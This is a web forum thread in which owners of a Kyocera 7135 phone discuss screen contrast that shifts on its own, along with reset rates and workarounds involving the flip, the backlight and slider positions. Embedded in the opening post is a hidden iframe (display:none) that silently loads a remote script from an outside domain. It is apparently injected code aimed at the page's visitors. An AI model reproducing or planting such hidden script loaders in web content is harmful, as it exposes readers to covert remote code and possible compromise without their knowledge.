Poll: Has anyone NOT had contrast shifts?

+ Reply to Thread
    jeh

Has anyone NOT had "contrast shifts"?

Sorry for beating this possibly dead horse, but I think the "contrast shift problem" is more serious than many believe. So I'm trying to see if there's a relationship between its presence, or absence, and "reset rates". Maybe a poll will help establish whether I'm right.

What is the "contrast shift problem"?

Upon opening or power-up, you notice the contrast is noticeably lighter than you'd set it. You bring up the contrast control and the slider is right where you left it. You move the slider one way or the other, and it changes the contrast as you'd expect... but at some point the contrast noticeably, abruptly changes. It's as though the control range was somehow "shifted" slightly and now it's shifted back. You set the contrast slider back to about where it was before, and the screen contrast is what you had before. Until next time.

Sometimes a few power off/on cycles will fix it too.

And... if you have NOT had contrast problems, have you nevertheless had to do soft or hard resets? How many, how often? I'm of course not including "expected" resets, like after loading a hack or ringer into the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Converged. It didn't even hurt! tuckeyr's Avatar
    I have had very few resets required. However, yes, my contrast settings shift very often. I've stopped going to the contrast settings to fix it, as I found, quite accidentally, that closing and reopening the flip usually fixes it. Sometimes it requires one or two tries, but that always fixes it for me. Beyond that, my 7135 has been extremely stable.
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

My trials have show that contrast shifts only occur if my contrast is set to the default position.

I normally have my Brightness all the way down. So lowering the contrast (to the left) makes the screen a little easier to read. Once I am in this config I do not get contrast shifts.
    -=Jimmyjoe=-

Ditto on this. I was having these problems until I set the brightless and contrast to something other than the max or default using the PDA prefs app - no more problems.

Originally posted by jimmyjoe 7
    My trials have show that contrast shifts only occur if my contrast is set to the default position.

I normally have my Brightness all the way down. So lowering the contrast (to the left) makes the screen a little easier to read. Once I am in this config I do not get contrast shifts.

I have never witnessed the 'contrast shift' problem, and, other than one bad legacy app that I had to delete, I've only had one hard reset condition in the past three months with the phone.

Nothing special, just a GetConnected phone with the Alltel firmware from back then. I just haven't run across very many problems at all.

Jim

I was having 1-2 contrast shifts daily for the past 2 months, corrected by closing and opening the flip. Yesterday, I let the battery level get quite low (11% on the LauncherX guage). Did a full recharge last night. Today, I have had the contrast shift EVERY TIME I have opened the flip. Any connection?

I am going to try setting my contrast at a different level to see if that corrects the problem.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

You may notice that the contrast (or the brightness) shifts when the battery starts getting low. I had this same issue when I had the Audiovox Thera (which I returned for a variety of reasons). The contrast or brightness shift on the 7135 may be a way for the battery to conserve power. Take note of your battery condition when you note this shift.

Hope this helps.
    Marvin

It didn't shift when the battery was low. It began shifting after I recharged it. I normally recharge every night. The battery is usually at 75% or more charged BEFORE I put it in the sync/charging cradle. I didn't get a chance to recharge the other night and the battery got much lower than usual. After recharging, the problem started.

I have my contrast set @ the space between the "t" of "adjust" and the "c" of "contrast". That seems to have INSTANTLY stopped the problem. Previously, I had it set under the "n" of "contrast".

I have had no more contrast shifts since making this change 45 minutes ago.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Krazman - OK - I thought that would help. Good Luck! Enjoy your phone!
    Marvin

Pressing backlight works great . . .

The suggestion of pressing the backlight on and off when the contrast shifts by itself works great. Thx to the poster who came up with it.

jeh
    IME "cycling" the backlight didn't always fix it. Sometimes yes, sometimes no. Later in the phone's short life, always no.

But this sort of thing reinforces my belief in my "oscillator in high-distortion mode" theory. In short I think it's a hardware problem, probably having something to do with voltage regulation... not software. I think most of the "resets" people are seeing are that too.

marv: a contrast shift won't conserve any power. The LEDs emit the same amount of light regardless of how much the LCD panel is letting through or blocking. The brightness control definitely does affect power drawn, but I never saw any "brightness shifts" (other than those I asked for via Energy Dimmer).

kraz:

> Yesterday, I let the battery level get quite low (11% on the
    > LauncherX guage). Did a full recharge last night. Today, I have
    > had the contrast shift EVERY TIME I have opened the flip. Any
    > connection?

I think so. But again, I'm just conjecturing (though it's a reasonably well-informed conjecture).

jeh
    Originally posted by Krazman
    I have my contrast set @ the space between the "t" of "adjust" and the "c" of "contrast". That seems to have INSTANTLY stopped the problem.
    I've tried this on my replacement phone. I even went farther, to directly under the "t" of "adjust". Still it shifts on every tenth or so power-on.

I found if I adjust the brightness more toward the middle (previously I had it up near the extreme right side of the scale), I can then adjust the contrast more in the middle as well and it will stay there.

It seems the phone likes to see both sliders adjusted near the middle.
    Marvin